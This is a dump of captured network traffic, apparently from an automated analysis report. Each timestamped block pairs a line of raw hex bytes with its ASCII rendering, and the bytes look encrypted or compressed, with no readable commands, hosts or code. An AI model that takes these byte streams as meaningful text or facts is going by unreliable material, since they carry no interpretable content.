                                                2021-10-13 18:35:47 UTC13INData Raw: 14 18 0a 2b df 09 57 0e 26 5c fa c7 fb 63 ff b2 68 1c 9b 6d 85 45 28 f4 49 87 22 31 37 1e 23 4e 97 bb d0 c2 f8 db 80 22 dd 58 99 79 15 1d 54 59 c2 5b fe e3 40 ca 7f 0d e9 b3 86 d0 a1 d6 16 8f ca 68 06 0e 32 36 4d 35 ed d1 e8 2d 68 1f 43 3c 71 d5 95 83 00 1b ae d6 18 85 51 1f 82 3d ad b1 2f 6f 8e d8 cf 2b 7f 5b 73 8d 50 46 ad 34 9a 4a e5 b8 a8 cc 68 af 31 af e4 24 34 15 ad 3c 9d 70 d6 c6 6b 63 50 51 d0 78 2d 6e 0d 4d 72 16 d2 3c 9c 43 30 38 4b 3b ae 31 7c 2b 79 ae 67 35 15 0e 89 57 cc 6e 08 14 36 36 c9 fe 04 4b 26 04 11 7f 70 03 37 9b 73 9a f8 c3 0b 68 05 7b 32 eb b5 2e fd 72 19 a0 c9 e5 4f bb e1 1f f6 0f 62 62 90 7b b5 39 1b 5c a7 d6 0a a7 8a cc 6e 19 59 cd 50 f3 1d 57 cf e6 2d 7f 07 c1 e6 30 17 a8 94 ea 3f a3 53 c2 36 11 10 16 3f a6 d9 88 da e1 4d 08 0e
                                                Data Ascii: +W&\chmE(I"17#N"XyTY[@h26M5-hC<qQ=/o+[sPF4Jh1$4<pkcPQx-nMr<C08K;1|+yg5Wn66K&p7sh{2.rObb{9\nYPW-0?S6?M
                                                2021-10-13 18:35:47 UTC15INData Raw: 6c 08 0c 39 e1 9e 62 79 15 1d 54 59 c3 d9 ea 1a 46 a2 37 9c 91 41 24 09 8d 5f 00 97 71 96 e9 ac 13 ff ea 36 50 9c f8 0c ec 2a 82 aa 7b 8a 4b 89 dd 92 e1 a2 97 cb cb 41 2d b6 7f be 20 46 14 05 98 2a f5 5f 5a f4 d8 0c 21 52 3f 42 54 43 ce 5f 4d 44 fe ef f3 1a 24 12 25 55 61 79 a3 09 9a e4 90 a5 e3 a8 5e 6b 8e 14 fc f2 70 f3 59 c1 c2 56 e6 15 52 44 61 20 d6 61 ea d0 50 4a 5c c0 49 2a ec 25 bb e1 11 a9 dd 5e 6b e8 2d c8 43 bd 00 0b b1 92 79 b1 31 79 a5 6a 4d 84 c1 ae f7 41 c7 b1 ba f5 06 10 e1 ba 45 c0 cc 6a 1b 40 87 af 0c d6 0f 45 73 39 c0 4e 4f 29 c8 65 f3 47 31 9d 34 75 91 a0 45 21 8e 04 11 c9 09 7c 65 65 14 a8 9b 78 3e 92 4a fd 92 f6 1c 18 36 fc 4d d0 26 40 54 4f c7 06 ba 5c 60 67 f4 bf e2 d4 11 10 ee f4 a4 b2 b8 57 6b 8e 3e af bb c2 e3 46 af 33 09 34 9d
                                                Data Ascii: l9byTYF7A$_q6P*{KA- F*_Z!R?BTC_MD$%Uay^kpYVRDa aPJ\I*%^k-Cy1yjMAEj@Es9NO)eG14uE!|eex>J6M&@TO\`gWk>F34
                                                2021-10-13 18:35:47 UTC16INData Raw: 99 79 d3 58 b8 88 80 33 bd ac d9 97 69 9b 68 4a b9 ad 46 79 e6 8b 6d bc 24 04 25 b6 2e d0 ad 90 a5 65 fd df 36 cb 74 ac d8 19 25 8c 3a 13 b2 ea 8b 52 53 2a cd 61 40 05 d0 9a 43 3f 17 e7 a5 a5 18 7d 6e e8 7e 22 3f f0 a4 9f 10 22 ed 67 65 c5 9f 11 ba a6 7f c4 50 4e 54 7a 1d ed 6d d3 8f 48 0e ed 3f 02 0e 26 03 5e 61 99 b6 52 75 88 29 e6 31 79 a5 04 e4 4b 55 d7 c8 70 79 9c 86 d3 cc 7c d2 2c 86 d3 6b cf 89 46 a5 59 d8 7f 8f 32 fa 91 6f 2e a1 7e 21 e7 e9 de 14 26 b3 3c fd 58 2e e3 f9 5e d3 c3 ba 4a 01 c1 a3 07 85 0d ab 40 b9 ba 52 1e c7 5e 2d 06 04 b5 64 1d 43 34 d4 0b df b5 5b e0 63 fe 0c 71 ea 30 45 6e 75 80 24 80 26 89 7f d1 ec 63 f8 3e d3 f8 db 7d 6b 96 0d 08 15 f4 67 88 18 59 fb ca 23 35 b2 a8 ed a1 16 5c 17 ae fa a2 e0 1e b4 a3 53 9a 07 92 e4 29 6f 28 6f
                                                Data Ascii: yX3ihJFym$%.e6t%:RS*a@C?}n~"?"gePNTzmH?&^aRu)1yKUpy|,kFY2o.~!&<X.^J@R^-dC4[cq0Enu$&c>}kgY#5\S)o(o
                                                2021-10-13 18:35:47 UTC17INData Raw: e9 e6 36 92 e3 a7 8e 52 7f ad 3f 68 df df 8c d9 9a e3 83 ae 42 ed 44 b4 a9 24 fd 83 ef 02 0e 26 f8 7f 0f 98 ea 22 ad f6 84 c8 69 81 bb f0 71 2e b9 c7 fd 6f aa 4e 26 7b ab 39 0f bc 68 ed a6 d0 79 a8 87 ef 6e 2a e6 24 31 30 f1 f5 8f 87 4e 57 cd 89 81 08 f2 82 3a 97 6a 3e b4 8f 96 8a 24 be 57 6c 6a f9 e2 58 ad 9d 08 94 da f6 a8 69 a5 cd 17 e9 bc 42 a4 f0 df 26 59 83 57 cc 65 12 df c6 62 73 9c 41 4a 0f 90 06 70 a2 57 b2 56 24 b9 b6 ba f4 b7 ce 9f 72 fd 81 dc a6 4a d3 17 81 07 27 19 60 bb b9 5e 06 0e 95 1e 6a eb c6 fa e1 1f 38 2c 51 03 94 c1 c3 c3 78 8b 19 59 da fb b6 d9 3b d9 c1 dd b5 16 88 6f a1 cf 1c 22 98 ec 22 d4 22 ec 9c 95 58 40 96 e2 e6 07 2e 04 47 37 09 82 19 ed 22 27 7c 36 3d ac 03 b9 2f 04 a2 63 02 8b b7 28 fe 72 1f 63 fd 66 4c 00 2d ea 03 ba ee 94
                                                Data Ascii: 6R?hBD$&"iq.oN&{9hyn*$10NW:j>$WljXiB&YWebsAJpWV$rJ'`^j8,QxY;o"""X@.G7"'|6=/c(rcfL-
                                                2021-10-13 18:35:47 UTC19INData Raw: 86 69 42 94 f0 ce ce ba 66 93 b1 6f 8f 5f f2 d5 da 16 08 cf 4c e3 b9 d7 90 eb b5 33 04 97 da 2d 6b 9f b9 05 94 0c 9b 25 5f e8 39 bc e5 21 47 26 e8 1a 25 20 c7 56 b2 f5 4e 59 d3 99 da 29 57 d1 e4 6e 11 98 d4 24 4d 93 71 86 d6 e4 fe f7 52 e4 c8 47 28 f8 ec 00 22 ff b2 31 99 3a 07 40 bb 62 b2 94 c3 32 65 16 53 dc 25 e7 36 47 38 99 6e a1 aa df 87 f1 97 7f 81 a4 93 6c 4a a7 de f8 c8 45 26 f7 4d 2b 63 e5 cb 2f 44 9c 2a 5a b8 1d 69 9a f0 fc d2 ad c0 45 13 b2 a7 0c 29 66 71 0e 36 67 e2 32 40 27 74 35 04 0f 58 48 b1 22 c1 3e 42 a2 3b a1 04 2c e8 2e d1 c9 24 d8 15 43 74 11 43 d6 cd c3 f1 e6 b1 0d 49 75 93 21 b8 4f de 00 2f e4 21 b4 b6 a3 56 74 54 59 84 d7 ac 0e 41 4d 3c 91 dc f8 84 d5 84 db b3 08 b9 85 24 d5 9e c5 ca 35 13 5d 0c 43 31 67 e3 9f 35 9f 24 7e 35 05 77
                                                Data Ascii: iBfo_L3-k%_9!G&% VNY)Wn$MqRG("1:@b2eS%6G8nlJE&M+c/D*ZiE)fq6g2@'t5XH">B;,.$CtCIu!O/!VtTYAM<$5]C1g5$~5w
                                                2021-10-13 18:35:47 UTC20INData Raw: 58 8b 4e 19 15 9b 29 8f f3 70 ff fa 6a a0 a1 02 10 38 a7 f1 79 a4 b0 42 0f a3 e9 eb ac a2 9e 3c cf e9 06 11 be af 11 b7 26 e2 07 f1 96 a9 0e 37 08 14 0e 9f f4 7b b8 48 b3 59 0b 95 b1 54 e4 4b 22 8a c4 8d 3e 0c 62 69 cc 65 da ff d2 71 a8 7d 04 96 fb 78 24 4e b8 76 2e ec 4d ea 72 04 1b 52 45 13 58 b2 2a e8 2f 63 d9 b6 5d 5f 79 b8 58 43 80 80 16 34 97 cc 31 7d fd 62 35 15 04 e1 38 8c dc 1f 7e 1d d4 fc cc 7d a4 cf e3 ec 27 88 2e 6a 06 0f bc 63 da 8b de 39 1b 5f 5d 56 f5 48 b3 20 e4 b8 83 7f bc 4b e1 8e cd eb b8 0e 26 a5 19 60 d4 e4 5b 71 8c c3 d5 2b 86 b1 2c e8 3f e2 f2 70 dd fc c1 63 10 b2 ae af 33 2e 58 d7 b5 38 86 20 34 e2 bc 5f f3 4c 09 5e 6a 2a 75 75 a5 10 3a ce 61 01 b4 12 1d aa 25 c3 cd f5 52 66 e4 ca 4a a1 12 6b 81 e1 86 7d 05 3f 10 27 66 54 7a 93 e2
                                                Data Ascii: XN)pj8yB<&7{HYTK">bieq}x$Nv.MrREX*/c]_yXC41}b58~}'.jc9_]VH K&`[q+,?pc3.X8 4_L^j*uu:a%RfJk}?'fTz
                                                2021-10-13 18:35:47 UTC21INData Raw: 27 70 0d 49 e1 84 8d 50 ff ab 73 a5 f0 b6 65 cd 45 c5 42 ae a8 98 da b3 1b 69 8d 5b bd c4 e8 07 45 19 a7 f3 e6 3f 07 9c dc b9 e5 4f 2a 6d b4 0c cb 4c b6 bb c6 57 72 66 5e 7e 2e a5 1c 7d c7 1e e1 46 16 a1 0b a1 0a 2b 8d 22 e6 3b 0c 98 27 7a 7b b6 52 ad 6b 82 3e 87 79 1c 2d d8 05 99 75 b0 32 c5 f5 51 de 44 bd 22 63 bd cc 72 1e f9 ea d5 21 52 52 42 9c 5d f4 e7 b8 58 36 52 7f 5e 89 72 1d 4b 27 53 79 1a 6e 00 0d a5 3f cc 96 db 98 e4 31 30 f7 6e 07 5e d0 4e 5a 4b 3c c9 eb a3 05 20 31 5f f4 d7 92 02 e5 8c dc 18 34 19 90 d5 97 67 41 5d f2 80 38 a3 b7 82 97 79 bf ca 51 5d 31 5b ee c1 94 f3 f8 f7 b1 00 bf 63 6f 8c cc 6e 27 fc 62 4d 2b 66 97 cc 6c b2 62 1a fc 5e 8e 79 a4 90 e1 96 4b 60 4b 23 43 90 51 a2 2b 69 80 3f f5 8b 5f c5 46 91 5c 79 b1 71 fb 87 f0 c2 4f d9 85
                                                Data Ascii: 'pIPseEBi[E?O*mLWrf^~.}F+";'z{Rk>y-u2QD"cr!RRB]X6R^rK'Syn?10n^NZK< 1_4gA]8yQ]1[con'bM+flb^yK`K#CQ+i?_F\yqO
                                                2021-10-13 18:35:47 UTC23INData Raw: c6 bf 82 35 47 3a ac 44 40 55 fd d8 e4 66 77 a4 91 fd 18 8f 5f fc bb d3 ca 73 71 76 65 fa c4 48 9a d1 65 df 23 4c a5 4c a3 eb 89 eb 83 f7 f7 11 a1 0c 22 e4 8f ce 43 2a e1 48 50 01 95 73 99 56 6b 26 7b 0d b2 ba a6 7c 70 0c 37 0c 65 fe fd 6e 1b 72 ba fa 6e 19 40 cf ec 73 99 9f ba 03 95 73 8d 6e 24 4e 69 34 82 26 05 5f 5d b6 a1 bf 68 8f 7a c8 8e 9b 65 ed 46 83 d9 70 35 1f 49 6b 98 15 dc b3 0e 90 09 d2 70 16 3a a3 a8 27 55 de 10 c7 0f ee df 81 bf f1 76 80 bb 67 ea 30 bd cf 12 57 74 34 66 99 2a e7 a5 0a 28 40 cf c1 d8 18 88 2c a6 9a fd 66 4a 80 94 a2 20 d8 05 72 a2 d4 18 3c 9a a9 02 13 bd da 34 1a a1 bb d2 6b c5 df d9 98 1f e5 f2 d2 61 e8 02 22 7b 53 76 2f 7c 88 00 ef 1f 46 14 1c 3d 3c 75 25 01 93 64 7a 12 90 98 d3 98 fa 9b 79 4d d0 d5 af ce 9f 5b ed 54 57 e1
                                                Data Ascii: 5G:D@Ufw_sqveHe#LL"C*HPsVk&{|p7enrn@ssn$Ni4&_]hzeFp5Ikp:'Uvg0Wt4f*(@,fJ r<4ka"{Sv/|F=<u%dzyM[TW
                                                2021-10-13 18:35:47 UTC24INData Raw: 7b ac ba 5e 51 55 f1 31 61 f4 65 3a f2 f8 ea 10 96 42 8e 15 2c a0 82 83 03 51 54 03 4a 69 bc a6 04 bc ee c9 c7 5a 00 0a fb d6 10 37 1f 49 06 65 ff 36 8c eb 00 5c c6 8c 80 3c 8b 9a 4c 51 cf d2 92 01 80 32 e0 22 38 37 97 71 9b 6c 2d 36 9d 50 fe 07 04 1b 44 b1 08 0d 63 12 ee 8e 86 2d 1b 59 34 9c b0 b5 34 63 fd 5f 56 28 f1 41 f3 a8 fe e2 c7 5c fe dc a7 fa dd 83 41 21 b0 02 ca 78 26 e3 92 c5 c1 4a 0b bf d7 bc 4a 7d 53 06 50 6d 6e 73 82 84 20 32 19 5a b3 18 46 9e b1 02 06 dc f5 87 0e 24 31 06 13 50 54 ff 42 8f 70 0a cb 41 47 a2 e2 ea 6b 8e 74 0f 46 8e d9 a4 90 22 6d e6 33 e7 b2 5f c5 d7 bc 55 0e cc a4 c9 e8 3a 87 73 aa 79 33 28 3f 78 bd 29 38 3b 9e a7 bf 76 4c f4 fb ce eb 08 b0 af 20 d3 9d 4d 8d 73 91 07 5f 83 fc f0 ca 69 8f 5a b9 39 00 13 ba 6d a7 57 c7 fe ef
                                                Data Ascii: {^QU1ae:B,QTJiZ7Ie6\<LQ2"87ql-6PDc-Y44c_V(A\A!x&JJ}SPmns 2ZF$1PTBpAGktF"m3_U:sy3(?x)8;vL Ms_iZ9mW
                                                2021-10-13 18:35:47 UTC25INData Raw: 94 08 32 ec 3d 1a 78 54 03 bd fe 5f 51 eb af 3f 06 86 73 94 ec 3d fa 0d bb 23 9a b9 ea 11 87 d5 a6 92 e9 a1 e1 7b ab cf 3e d1 e0 16 14 e8 89 b2 54 57 df 84 da 09 84 f5 ef dd be 98 96 e1 81 fd 40 af 1d e6 c2 ce 7e 3d a3 c1 de fd a4 d6 32 a1 6c e7 52 c1 ff 46 30 94 83 48 b3 dc a6 6c 09 82 25 06 90 a8 94 1e b8 8b 72 3a 75 e2 c5 67 97 91 87 3d 15 94 0d c6 58 74 f7 1c 50 9b 08 ea 4c bd cf f0 66 7d 24 dc 15 5e a3 38 e3 75 cb f4 e0 c3 38 16 1f be 6e 8f 71 a1 3f 23 69 a9 3f 3c bb ef 5d 2b 8b 9b 2f 79 bc 44 8e e6 1e 2a 71 bd 15 10 64 b3 c7 77 27 50 fb fb 85 a8 93 c8 82 ed 47 3a 95 d5 5a 0b a8 7c bc 7a 02 0b a0 9e d4 16 19 ec e8 a9 13 a4 23 94 e6 1a 13 41 03 3d c1 0c e1 03 5a bf d1 4f 48 98 5c fd d5 2f 8d 53 cc 6c b3 5e 6b 60 1e cc 5d 8b f8 ed 05 9e 98 e9 a2 65 16
                                                Data Ascii: 2=xT_Q?s=#{>TW@~=2lRF0Hl%r:ug=XtPLf}$^8u8nq?#i?<]+/yD*qdw'PG:Z|z#A=ZOH\/Sl^k`]e
                                                2021-10-13 18:35:47 UTC27INData Raw: 44 70 82 5f 8b 0d 65 57 87 1d 62 fc cc cc db 3b fd 75 26 c9 ed f9 97 21 7f 5b 9a e4 91 f1 47 6b 86 bf da 07 97 71 c1 d8 4a b5 00 bb a3 0f 92 c3 42 be e4 30 ed f9 90 f2 e6 ea f9 91 53 74 bd 24 78 70 1e c6 6c 44 ad 31 67 e3 13 57 3e 05 99 75 da 0a 2c 27 d6 b1 bf c4 52 5d 75 0e 50 4e 5b 0a d6 1c 8c cf e8 21 4c 1e 26 cd e4 2b 84 18 3a b0 47 d8 e3 31 64 61 d9 15 a3 a0 87 4a 0d 91 89 6f 3d 9c b0 a3 1b 08 19 55 d5 9c 4b 81 51 60 75 96 d4 ba b5 8f 75 00 1a ba 5e 6c e7 91 8f 71 36 2f 0c 3a 92 0a a1 00 e1 c7 51 e5 e6 e4 30 ed 4e 79 38 c5 b7 39 14 df 55 b7 d6 aa a4 48 80 84 59 63 68 15 a3 16 31 59 f8 b0 3e c1 c5 c6 7a 28 0f 18 39 0c 3b 0c 0c 00 ea b2 29 64 61 e7 29 5f 99 60 78 66 76 2c f7 50 f3 f7 b8 5c 64 6f bd f7 bc b3 95 65 fd 66 d8 6d ee d5 85 d7 b3 5a 51 d0 4b
                                                Data Ascii: Dp_eWb;u&![GkqJB0St$xplD1gW>u,'R]uPN[!L&+:G1daJo=UKQ`uu^lq6/:Q0Ny89UHYch1Y>z(9;)da)_`xfv,P\doefmZQK
                                                2021-10-13 18:35:47 UTC28INData Raw: 9d 0b 4e d0 ba a2 5d 8e 11 34 72 c4 44 51 e4 4a 4c da d4 03 7d 1c 3f c6 e8 03 d2 72 c3 85 23 90 35 98 96 2a 18 ca 0b c0 59 ba d9 82 8a 07 37 7c 4c fd c6 ee b2 59 ac c2 d8 c2 d5 75 bd db 8e 65 91 c4 85 3c 77 6e 84 0b 00 bf d2 7a ac 3c 74 26 96 33 2c 61 13 b4 96 7d 78 25 d5 f5 9f ce 90 0d 66 5b 0d 7d ac 4b 11 9a 35 17 bb ce 47 8e e0 34 c4 08 74 be f5 3f 34 a0 19 e5 b1 33 f2 c3 e9 07 b1 49 db 36 f9 2b 90 05 39 21 e0 4a 17 7a 35 8a c9 0f ef 53 1c e8 3f 82 7a bc b8 0d dc ce 31 a7 9c 60 4b ad ee a5 e7 a0 93 32 0b de 75 29 51 50 e4 4b d6 49 93 10 ad 0c 7e 17 4a c7 d8 b9 08 2b f8 bb dc f2 85 8c bf a1 35 0b 91 70 f1 7a 38 e9 4b 28 ec 18 9b 33 cc c8 61 d2 4b 3b 42 a2 74 e3 21 d3 a9 93 76 90 86 d3 60 60 57 d0 2c c4 ef ed 2f 14 1a 9e b5 ec c8 c0 14 c6 e8 9e a2 a9 71
                                                Data Ascii: N]4rDQJL}?r#5*Y7|LYue<wnz<t&3,a}x%f[}K5G4t?43I6+9!Jz5S?z1`K2u)QPKI~J+5pz8K(3aK;Bt!v``W,/q
                                                2021-10-13 18:35:47 UTC29INData Raw: 6a 2d 67 e4 28 c0 73 7f 6f 0f 22 1e c0 45 c3 02 10 c2 91 28 93 48 80 92 63 9d 72 00 b1 f6 c4 bc 95 21 29 8d 30 4b d5 3a 97 5a 71 a5 b7 9e f6 d9 84 70 de 0f 36 f9 3b 11 b8 fc 8e c9 44 c5 e7 bd cb 92 c0 58 bd e5 ac a5 a3 3e 89 f6 af 3a 91 a7 3c ac c3 10 1c 2c 49 19 9a 34 ab ce d9 a7 f1 1b 4c 04 a9 40 8e a1 c7 c3 e1 6f bb 24 94 f5 11 a2 ce 6d 94 fc fd 3a 8e dd 8e da 42 bf f2 0b a0 82 3f 01 96 31 1f 47 3b 1a ca 6b 18 95 0e 25 48 5b 38 9e 31 78 9f c7 a8 b5 89 49 d3 ff 67 13 b4 ea 23 69 aa c3 d0 47 92 3f 0d a0 82 85 95 6e 6c 1d 48 b8 89 04 71 29 7f f2 c1 31 61 fb 8f 61 f2 e0 0a 35 37 a1 83 67 f0 df 70 7a 26 bf c2 55 ca 6a 1e d6 44 a7 0d a1 08 2a b1 39 3e 50 47 39 0f a9 04 b7 40 86 65 1e b9 c3 cc c3 17 e7 50 56 a4 57 9d 84 eb dd 4c 94 c0 81 00 dd ce 3f a0 94 a0
                                                Data Ascii: j-g(so"E(Hcr!)0K:Zqp6;DX>:<,I4L@o$m:B?1G;k%H[81xIg#iG?nlHq)1aa57gpz&UjD*9>PG9@ePVWL?
                                                2021-10-13 18:35:47 UTC31INData Raw: 87 5f e1 ad 03 68 7d aa 26 0f 9a f8 d0 72 fb db bb da 11 a2 b2 13 be 23 40 96 0b e9 ad 98 46 a9 11 ac bb 29 2f 67 c8 50 db e1 a3 19 5b 55 10 3a 0a 4f 84 d2 69 3e 70 c4 5a 5f ea 82 b5 2b 60 d9 9b 6e c9 83 55 d3 82 39 14 a5 1f b4 4e 59 d3 94 f0 9b 8a a2 f8 d9 b2 10 0d 94 e3 a3 e8 89 de 03 94 ea 76 28 a0 7f a1 17 bf 3e 74 2d 65 f7 4f e5 81 91 4d 9e 13 a9 13 b1 c9 2d 47 8d bb 6d 84 db 95 83 9b 26 81 8f e5 6e 59 c6 75 86 cb ae b9 79 6b d8 10 2f 7a 3d 49 30 4b ef 1e cd f1 4f d9 d0 77 18 6f 79 a0 d9 b0 10 4f d9 e6 c8 0e 20 67 58 5d ac 57 6f bc 58 c5 87 71 ad 49 f5 7f 0d 3d 27 b8 fe 80 27 32 0c 2d 71 92 5d 5b cc 73 99 6c 2c d5 5a 4a a8 9c e5 34 4d 41 26 ef f2 04 1a 7c 8b cd e5 af 21 72 31 ec 2f 75 92 e8 d8 db 88 79 0a 5f 21 b2 5f b7 29 6e 0f 41 46 b6 14 8c 9e 9f
                                                Data Ascii: _h}&r#@F)/gP[U:Oi>pZ_+`nU9NYv(>t-eOM-Gm&nYuyk/z=I0KOwoyO gX]WoXqI=''2-q][sl,ZJ4MA&|!r1/uy_!_)nAF
                                                2021-10-13 18:35:47 UTC32INData Raw: 48 ab 3b f0 0d a5 f7 95 f7 46 af 20 d6 eb 8d ae 93 dd e6 81 9a 60 7e d4 1c ca 82 dd 43 1c 27 5f 60 40 b5 a7 ec 1c ce 75 21 81 a8 75 46 ff 6a e0 44 27 59 e9 24 e2 3d 13 b2 50 94 f7 c6 f7 53 c4 5c f4 45 15 b5 34 51 dc 03 82 28 89 7f b8 a5 a2 53 ce 74 1f 45 fb ce 16 31 69 49 8b 29 79 15 cf 78 01 a3 25 fd 1a db 83 43 c9 9c f8 10 34 db 7c df db 8d 4c b3 84 b3 3a 76 0e 2d 23 50 6b ad 9c 89 b5 0f 9b dc 00 7c 31 6e e9 71 bb 77 60 27 76 51 6a 9a 4f c8 6e 0f cf e6 95 44 27 d7 33 d8 07 81 b4 99 5b ea fa e2 c4 21 ba fb 9d 39 14 2f 68 9d 7a 23 43 3d f7 ec 64 71 95 71 2f 95 95 2a e1 ef 45 6e 16 de d9 89 76 15 85 d0 ca 6b 89 4c 5f da e7 f3 4e 6e 3f ed 29 e6 8d b0 a2 9c fc 4b 5d 69 a3 2e 6f 12 3e 8b 42 18 16 21 19 2f 92 5f 34 84 cf e0 14 0c 04 30 69 74 18 39 15 52 80 8d
                                                Data Ascii: H;F `~C'_`@u!uFjD'Y$=PS\E4Q(StE1iI)yx%C4|L:v-#Pk|1nqw`'vQjOnD'3[!9/hz#C=dqq/*EnvkL_Nn?)K]i.o>B!/_40it9R
                                                2021-10-13 18:35:47 UTC33INData Raw: 58 4d 38 30 37 0a aa 7b ba 5e 32 dd 23 ba e1 bf db 9b 5e 8f 76 ba 76 8c 82 92 ef 4c 07 5a 4e a7 d5 9a 16 77 b1 20 c5 34 ff c9 c1 e5 07 02 a7 14 2c 5b 39 1f 0c d2 68 13 b1 13 11 65 dc 1d 4f 78 f6 c3 36 5d 3a 93 6e 0f a9 4f c8 20 df a1 a8 35 24 ca 62 ca a4 9f ef a2 82 3e 89 aa 8f 49 2d 68 2f 41 9e 18 18 e9 bb d9 fa d9 41 f0 f0 37 34 ab ce d9 32 5d f5 43 24 d1 c6 51 f4 b0 7b e3 ac ae af 30 c2 bd 28 e2 3e 93 73 ad 04 b8 fc 04 0d b1 35 97 d9 da 19 40 27 37 14 68 13 5a bd 64 75 86 d7 a4 b4 1b f4 94 e7 a7 fc 27 05 80 23 4d 10 c8 85 a5 19 55 ca 5e 16 fc d5 be ff 8a d2 73 91 67 65 32 c2 4e 59 66 bc 1e 74 dc 45 c6 8a ed 5a b8 99 7b b5 30 f8 f5 cd f5 1b 4e 41 9c 29 6c 68 ea 23 46 a8 93 d0 0b b4 bd c2 7e af 2b 2d 63 e5 16 12 3a 96 c2 74 2c 4a b9 90 f9 46 44 6b 81 db
                                                Data Ascii: XM807{^2#^vvLZNw 4,[9heOx6]:nO 5$b>I-h/AA742]C$Q{0(>s5@'7hZdu'#MU^sge2NYftEZ{0NA)lh#F~+-c:t,JFDk
                                                2021-10-13 18:35:47 UTC35INData Raw: 78 46 78 68 0b ad 21 4f f8 3f f9 cb f5 5a 4a 80 4d 96 d1 42 1d e3 bf db 9b eb b7 1d 58 47 82 6c 02 e3 44 35 06 0d ba 6a eb d1 61 d4 63 32 de d3 fe 4a 87 5e 4c bc 81 d8 aa f7 41 14 2a 25 3a 3d ff 70 68 0e e4 52 e3 4e 5f 80 21 6f 7d 0e 22 40 3a a8 98 fe 04 d9 83 ae 1c 5d e7 b3 32 ca 3a 9c b8 7e 69 cf cb 4e 5e bf d7 93 dc ce 66 5f 7f e3 fa d1 e0 c4 87 42 13 78 3e 23 cc 68 1e cf 18 83 e5 bb c8 70 37 4e 4a f5 05 c0 10 05 08 da dd 8c cf 10 ff 65 cf 6f 81 fd 62 7f 01 40 8e 33 de 1c 2d fd 6d 85 44 4d db 35 04 03 9b 4f 92 e3 f4 98 b7 7e 1a 65 0f 69 82 3c 70 d7 96 d8 af ee 9e 96 ef ad f1 52 ff a1 1c 70 a4 8e cd eb 5a b7 aa 9c fc fd 56 13 b6 e8 79 f9 10 13 23 ee 06 13 a9 f6 1e c5 f2 53 46 e1 b5 22 34 48 bb 7e e1 f2 81 52 a9 8b 56 49 2a d1 a1 01 c6 57 93 26 d0 df a7
                                                Data Ascii: xFxh!O?ZJMBXGlD5jac2J^LA*%:=phRN_!o}"@:]2:~iN^f_Bx>#hp7NJeob@3-mDM5O~ei<pRpZVy#SF"4H~RVI*W&
                                                2021-10-13 18:35:47 UTC36INData Raw: 07 97 71 73 48 a5 58 92 ff 7f b9 6f 7e 49 39 09 73 4e 48 9c 1f b4 66 6c 11 b4 86 55 e0 ed 55 c9 00 eb 69 84 c3 c7 d4 ae b7 aa 94 e1 e7 94 53 79 9a f4 c7 ff 52 a5 78 be 60 f6 ea 3a 8a d6 ec 88 34 a4 25 6d 26 bb e4 1f c8 ba 41 29 66 91 1a 0d 96 52 a8 3d 5e 49 12 a9 db 93 79 aa 31 a1 7e 48 8f 5b a3 00 3f fc cc e7 06 46 3f 4d 7f ea 42 f5 47 f3 5a 5f ff 70 31 95 2d 55 42 91 c7 7d 8c da 19 67 d5 ae 37 30 e3 a5 04 e7 69 9c 02 0c 23 5a 59 f0 e3 94 0f 31 51 0d 80 b8 21 28 01 41 bf 81 a7 2e 63 6f 36 ac 1b df 74 87 34 84 ca 6a 28 d7 31 33 05 25 38 6c 28 d9 e9 25 c4 31 db 81 ba f9 92 f5 e1 76 72 09 b5 0b 1c 50 61 39 e7 5f 24 dc 17 a0 b6 0f 9b dc 31 eb e2 bd d5 99 cb 2f 68 32 6e 0d 11 df 9f e5 17 1c df 98 f2 89 5b e7 a4 89 7b 0b 36 86 c6 77 13 5a c3 d4 06 14 07 2a 56
                                                Data Ascii: qsHXo~I9sNHflUUiSyRx`:4%m&A)fR=^Iy1~H[?F?MBGZ_p1-UB}g70i#ZY1Q!(A.co6t4j(13%8l(%1vrPa9_$1/h2n[{6wZ*V
                                                2021-10-13 18:35:47 UTC37INData Raw: 10 e9 77 7c 29 de 14 da 24 c4 e3 96 c8 20 29 d6 3e 76 4c b9 27 cc 7f 09 a6 86 2e bf d9 7f 90 70 a8 cf 5e b6 c6 73 81 b7 30 f3 ac a3 b5 a4 0e e5 f1 ed 86 04 04 b3 2d 2e 50 45 b9 72 44 bb c3 48 bd 38 55 2b 68 01 8b e8 76 b9 7b 55 a3 ff 25 e0 00 b8 79 0d 60 a0 89 f5 67 64 ca b5 98 24 83 9f ba 11 07 54 93 76 93 de 09 76 e8 69 50 49 fe 0b 13 b5 2c 4a af dc cf 0f ad 3f 1d e4 1b e0 ce 92 fb 96 a4 71 b6 07 34 46 72 17 55 3f 8c 3e 22 4a 09 40 39 c8 30 32 1b 73 84 89 af 3f d2 c3 e0 31 c6 53 5b 29 be 44 b1 e4 2c 0c eb 7b ae b5 26 53 a9 b2 5b 54 40 67 b3 d5 b1 c6 5e f6 67 b9 5b 26 37 07 75 0c be 93 39 a0 38 37 1b 01 45 21 fd da a6 0d 1e ba e0 e5 68 0a 0c f6 ce 90 20 19 4a b7 3f a3 21 f8 35 fe fa 5b b8 a9 20 37 bc e4 94 81 bf 1e 19 57 39 af 97 40 84 21 07 3e 01 4e 14
                                                Data Ascii: w|)$ )>vL'.p^s0-.PErDH8U+hv{U%y`gd$TvviPI,J?q4FrU?>"J@902s?1S[)D,{&S[T@g^g[&7u987E!h J?!5[ 7W9@!>N
                                                2021-10-13 18:35:47 UTC38INData Raw: 53 8a c2 9c 68 1e bf 19 10 3e fa 0d ef 46 3e ea 24 cb f0 61 41 04 24 fa 1c df a6 ad fc fb 73 5a d7 7a 6b b5 d7 1b a3 93 09 7f 85 54 e0 47 33 22 f4 32 b5 31 4d 8b 19 40 fa 01 40 e3 7f d9 f2 bf ba 96 86 0a 77 d6 73 e0 ee a4 4c c3 6c ba ab e0 49 f8 2a 07 25 69 4a de d0 5f c9 cf d8 c5 bf 13 8f 6c 22 eb 7b d0 a2 a5 39 32 ce aa f8 45 19 6c 3a a9 d6 73 33 2c af 6c 4e 90 94 41 7f ef 19 06 c5 a2 27 38 c8 27 24 11 d3 16 68 5d b7 74 de 6e ae e0 6f d8 5a 9a 92 70 66 15 c1 b1 e7 ce db e3 df f2 a6 5e 03 80 45 5a 23 24 60 75 cf a7 8a d7 65 8a d5 96 19 43 22 00 a1 0c 3a 1d 60 6f 4e f8 c7 e3 7f bf cd f4 54 7d a3 05 79 01 82 f1 d2 6b 40 7f a2 85 87 5d 16 10 22 0c 90 c1 d3 94 2a c5 d3 98 fa 55 f2 d7 84 7f 13 bc 87 e0 3c 81 1c ca c9 f5 8f 4f 4d 0e 28 21 e2 08 0f b0 7a 19 48
